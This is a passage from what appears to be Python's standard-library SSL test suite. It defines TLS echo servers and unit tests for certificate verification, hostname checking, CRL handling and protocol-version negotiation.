from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
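# Besides echoing data back lowercased, the handler implements a small
# text protocol used by the tests below (see run()): b'over' ends the
# connection, b'STARTTLS'/b'ENDTLS' switch TLS on and off, b'CB tls-unique'
# returns channel-binding data, b'PHA' triggers post-handshake auth, and
# b'HASCERT'/b'GETCERT'/b'VERIFIEDCHAIN'/b'UNVERIFIEDCHAIN' report on the
# peer certificate.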
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
# bpo-44229, bpo-43855, bpo-44237, and bpo-33450:
# Ignore spurious EPROTOTYPE returned by write() on macOS.
# See also http://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/
if e.errno != errno.EPROTOTYPE and sys.platform != "darwin":
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
elif stripped == b'VERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_verified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
elif stripped == b'UNVERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_unverified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(1.0)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError as e:
if support.verbose:
sys.stdout.write(f' connection timeout {e!r}\n')
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.close()
def close(self):
if self.sock is not None:
self.sock.close()
self.sock = None
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
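# Note: the asyncore module is deprecated in newer Python releases; this
# helper only exists to exercise the example asyncore integration checked
# by test_asyncore_server below.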
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds;
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(
ssl.SSLError,
'alert unknown ca|EOF occurred'
):
# TLS 1.3 performs the client cert exchange after the handshake
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
